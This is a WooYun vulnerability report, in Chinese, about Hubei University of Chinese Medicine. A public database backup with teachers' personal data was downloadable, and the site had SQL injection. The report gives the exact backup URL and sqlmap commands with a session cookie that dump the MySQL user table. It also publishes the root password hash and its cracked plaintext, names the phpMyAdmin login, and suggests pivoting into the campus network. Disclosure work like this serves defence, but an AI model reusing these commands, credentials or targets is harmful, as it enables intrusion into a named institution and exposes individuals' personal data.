当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071588

漏洞标题:湖北中医药大学某系统备份数据可下载+SQL注入

相关厂商:CCERT教育网应急响应组

漏洞作者: 蓝色水晶球

提交时间:2014-08-08 17:48

修复时间:2014-08-13 17:50

公开时间:2014-08-13 17:50

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-08: 细节已通知厂商并且等待厂商处理中
2014-08-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

1. 数据库备份数据可直接下载,其中包含教师姓名,出生年月,联系方式,邮箱等敏感信息。
2. 存在SQL注入

详细说明:

偶然间用搜索引擎搜到该网站的SQL数据,用IE访问根本转不动!当时以为该网站不能正常访问,准备放弃时,将该文件用迅雷下载。好家伙,74MB,难怪没反应了。翻了翻,该数据是2013年备份的。

漏洞证明:

输入http://npe.hbtcm.edu.cn/databackup/huaqin_database_backup_%202013_2_8_03_23_28.sql

2.png


从上图看网站好像已经被黑阔踩过点了

7.png


通篇都是弱密码123456

8.png


里面有教师姓名、出生年月、电话、邮箱等敏感信息。数据库里共18950条记录。
根据获得用户口令登录系统

1.png


4.png


6.png


系统多处存在SQL注入,例如http://npe.hbtcm.edu.cn/teachercp.php?action=declare_article&todo=show&id=2965,注入点为id,用SQLMAP跑
sqlmap -u "http://npe.hbtcm.edu.cn/teachercp.php?action=declare_article&todo=show&id=2965" -p id --cookie="PHPSESSID=im46qafuhardvo68v9vkq5omj0" --dbms mysql --dbs

9.png


懒得用SQLMAP一个个的导了,直接获取数据库root密码
sqlmap -u "http://npe.hbtcm.edu.cn/teachercp.php?action=declare_article&todo=show&id=2965" -p id --cookie="PHPSESSID=im46qafuhardvo68v9vkq5omj0" --dbms mysql -D mysql -T user --dump

12.png


数据库root密码:CBEEB782C86AED5957C30DFF0F755C709AA9BEBA,破解后得出51tekhantang
http://npe.hbtcm.edu.cn/phpmyadmin后,输入root/51tekhantang,就可以对数据库进行可视化操作了

13.png

修复方案:

虽然该系统仅用来展示精品课程,也不该将数据库备份数据放在公网任人下载啊,里面还有很多老师的个人信息呢。该网站与学校的其他网站处于同一网段,完全可以将这个网站作为跳板渗透到学校内部,我就不实验了。
修复:
1、删除备份数据
2、过滤,解决SQL注入。

版权声明:转载请注明来源 蓝色水晶球@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-08-13 17:50

厂商回复:

最新状态:

暂无


漏洞评价:

评论